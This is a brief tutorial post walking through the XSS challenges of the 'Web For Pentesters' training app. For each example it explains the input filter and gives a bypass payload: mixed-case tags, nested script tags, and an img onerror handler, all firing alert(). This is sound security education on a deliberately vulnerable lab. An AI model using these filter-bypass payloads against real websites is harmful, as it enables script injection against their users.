Ready to Start Your Career?

Part 1: XSS Exploitation and Code Analysis

Chilico 's profile image

By: Chilico

July 18, 2016

XSS Exploitation and Code Analysis - CybraryToday, I'll solve the XSS challenges from the "Web For Pentesters" vulnerable app and analyze the code behind what we see. Let's start...Example 1:ex1What does the code above do? It GET's the parameter "name" and echoes it back to the user. Also. we will not see any input sanitization on this example, so our XSS payload will look like this:<script> alert('1st example')</script>ex_1  Example 2:ex2In this example, the code does exact the same thing as the first one. The only difference in this one is the sanitization. The input has been defined inside the brackets and will be replacing it. Our payload will look like this:<ScripT>alert('ex2')</ScripT>ex22  Example 3:ex3The above code does exact what the second one does. In this one, the developer also sanitizes the capital letters. Our payload will look like this:<sc<script>ript>alert('ex3')</sc</script>ript>ex33  Example 4:ex4This code is absolutely different from the rest. In this one, any use of the word script capital or not, will kill the application. Our payload must not have the word script inside. Our payload will look like this:<h1><font color=blue>ex4</h1>ex44<img src=" " onerror=alert('ex4')/>ex4_2 
That's it for now. Stay tuned for more posts in the future...
Schedule Demo